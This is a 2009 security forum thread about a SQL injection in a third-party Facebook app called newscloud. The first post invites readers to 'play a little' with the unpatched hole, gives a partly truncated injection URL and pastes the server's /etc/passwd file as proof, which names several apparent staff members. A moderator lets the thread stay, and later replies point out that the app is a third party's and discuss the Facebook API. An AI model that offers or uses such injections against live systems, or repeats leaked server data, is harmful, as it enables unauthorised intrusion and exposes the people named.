Facebook SQL Injection
Results 1 to 4 of 4

Thread: Facebook SQL Injection

  1. #1
    Junior Member
    Join Date
    Mar 2003
    Posts
    12

    Facebook SQL Injection

    **t34b4g5's Edit, i am allowing this thread to remain, see post below ***


    I'm not sure if i'm allowed to post this here, if this is against the rules just remove the thread

    A team member discovered this a few weeks ago and it still seems to be unpatched

    Be my guest and play a little with them, a site big as Facebook should be aware of security, hopefully their box is hardened
    ***Click at your own Risk***
    http://apps.facebook.com/newscloud/?...737764%29,10--
    ***Click at your own Risk***
    Code:
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
    bin:x:2:2:bin:/bin:/bin/sh 
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    user:x:1000:1000:user,,,:/home/user:/bin/bash
    sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin
    todd:x:1001:1001:Todd Weaver,,,:/home/todd:/bin/bash
    jeff:x:1002:1002:Jeff Reifman,,,:/home/jeff:/bin/bash
    mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false
    Debian-exim:x:102:104::/var/spool/exim4:/bin/false
    statd:x:103:65534::/var/lib/nfs:/bin/false
    identd:x:104:65534::/var/run/identd:/bin/false
    adam:x:1003:1003:Adam Faja,,,:/home/adam:/bin/bash
    rick:x:1004:1004:Rick Kowal,,,:/home/rick:/bin/bash
    russell:x:1005:1005:Russell Branca,,,:/home/russell:/bin/bash
    daniel:x:1006:1006:Daniel MacDonald,,,:/home/daniel:/bin/bash
    postfix:x:105:106::/var/spool/postfix:/bin/false 4
    Last edited by t34b4g5; September 16th, 2009 at 12:38 PM.
    silent play in the shadow of power...

  2. #2
    Senior Member t34b4g5's Avatar
    Join Date
    Sep 2003
    Location
    Australia.
    Posts
    2,391
    Greetz..

    Nice thread, wish there were more type's of threads like this being posted.

    anyhow i am letting this thread stay. Simply because these arn't the freshest POC's floating atm.

    So until they are rendered useless don't be silly and get yourself raided by the FBI'z

  3. #3
    Member d34dl0k1's Avatar
    Join Date
    Mar 2007
    Posts
    58
    actually, what you've found is a injection in a third party app on Facebook

    http://developers.facebook.com/

    apps.facebook.com is the domain name, but that's not their data.

  4. #4
    AntiOnline Senior Member souleman's Avatar
    Join Date
    Oct 2001
    Location
    Flint, MI
    Posts
    2,884
    Considering what the 3rd party app is (newscloud), it doesn't really surprise me.

    If I remember correctly (been a whild since I looked at it), there is a problem with the facebook API that allows any member to post their own information. Instead of setting it up like the members are contributers, it is set up like they are members, so "need" direct access to the database. Even if facebook fixed the problem, I'm sure a lot of developers didn't do it right. You can probably get the same type of results from most apps that allow people to submit their own content on facebook.
    \"Ignorance is bliss....
    but only for your enemy\"
    -- souleman

Similar Threads

  1. Shoestring SQL Injection Prevention
    By catch in forum The Security Tutorials Forum
    Replies: 27
    Last Post: August 9th, 2006, 09:01 AM
  2. SQL Tutorial Basics
    By mikester2 in forum Other Tutorials Forum
    Replies: 5
    Last Post: January 31st, 2005, 01:16 PM
  3. Heads Up - Cumulative Patch for Microsoft SQL Server (815495)
    By CXGJarrod in forum Microsoft Security Discussions
    Replies: 0
    Last Post: July 23rd, 2003, 11:00 PM
  4. SQL Injection
    By sambeckett in forum AntiOnline's General Chit Chat
    Replies: 1
    Last Post: February 13th, 2003, 08:53 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •